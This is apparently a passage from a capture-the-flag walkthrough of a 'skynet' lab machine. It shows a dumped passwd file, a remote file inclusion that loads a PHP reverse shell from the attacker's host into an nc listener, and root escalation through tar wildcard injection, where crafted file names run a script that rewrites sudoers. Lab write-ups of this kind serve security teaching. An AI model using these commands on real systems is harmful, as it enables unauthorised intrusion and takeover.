root❌0:0:root:/root:/bin/bash daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin sync❌4:65534:sync:/bin:/bin/sync games❌5:60:games:/usr/games:/usr/sbin/nologin man❌6:12:man:/var/cache/man:/usr/sbin/nologin lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail❌8:8:mail:/var/mail:/usr/sbin/nologin news❌9:9:news:/var/spool/news:/usr/sbin/nologin uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy❌13:13:proxy:/bin:/usr/sbin/nologin www-data❌33:33:www-data:/var/www:/usr/sbin/nologin backup❌34:34:backup:/var/backups:/usr/sbin/nologin list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync❌100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network❌101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve❌102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy❌103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog❌104:108::/home/syslog:/bin/false _apt❌105:65534::/nonexistent:/bin/false lxd❌106:65534::/var/lib/lxd/:/bin/false messagebus❌107:111::/var/run/dbus:/bin/false uuidd❌108:112::/run/uuidd:/bin/false dnsmasq❌109:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd❌110:65534::/var/run/sshd:/usr/sbin/nologin milesdyson❌1001:1001:,,,:/home/milesdyson:/bin/bash dovecot❌111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false dovenull❌112:120:Dovecot login user,,,:/nonexistent:/bin/false postfix❌113:121::/var/spool/postfix:/bin/false mysql❌114:123:MySQL Server,,,:/nonexistent:/bin/false
So the next idea was to include a remote file from my computer with a reverse shell. Knowing that the skynet machine can run PHP I just downloaded a reverse shell from here:
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
I made it accesible with python and also setup a nc listener:
python3 -m http.server 7777
nc -lvp 8889
Finally trigering the file:
10.10.😄/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.9.😄:7777/shell2.php
listening on [any] 8889 ...
10.10.😄: inverse host lookup failed: Unknown host
connect to [10.9.😄] from (UNKNOWN) [10.10.😄] 54896
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
16:20:17 up 1:52, 0 users, load average: 0.00, 0.06, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
User flag:
$ cat user.txt
7ce5c2109a40f958099283600a9ae807
$ ls -lrta
total 4584
-rwxr-xr-x 1 root root 74 Sep 17 2019 backup.sh
drwxr-xr-x 5 milesdyson milesdyson 4096 Sep 17 2019 ..
drwxr-xr-x 2 root root 4096 Sep 17 2019 .
-rw-r--r-- 1 root root 4679680 Jun 17 16:23 backup.tgz
4 - Post-Exploitation and privilege escalation
Now I have a low privileged user. I started enumerating basic things, one of those was the crontab:
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
Great, a one minute crontab as root using a shell script in the milesdyson /home.
The shell script contains:
$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
This is good, because I got the user www-data who can write on the path /var/www/html and also there is a flaw when using tar with a wildcard:
The approach is to make my low privileged user sudoer without password to scalate privileges. Setting what the exploit says on /var/www/html.
$ echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
$ echo "" > "--checkpoint-action=exec=sh privesc.sh"
$ echo "" > --checkpoint=1
A few seconds later and after some date commands to know how many seconds left to gain one minute on the system.
$ date
Thu Jun 17 16:28:55 CDT 2021
$ date
Thu Jun 17 16:28:57 CDT 2021
$ date
Thu Jun 17 16:28:58 CDT 2021
$ date
Thu Jun 17 16:28:59 CDT 2021
$ date
Thu Jun 17 16:29:00 CDT 2021
$ date
I could not use sudo with my shell because I forgot to upgrade the shell with the trusty python:
$ python -c 'import pty; pty.spawn("/bin/bash")'
After that I can use sudo without restrictions:
$ sudo bash
Rooted:
root@skynet:/var/www/html# id && whoami && uname -a
id && whoami && uname -a
uid=0(root) gid=0(root) groups=0(root)
root
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
Thanks for reading!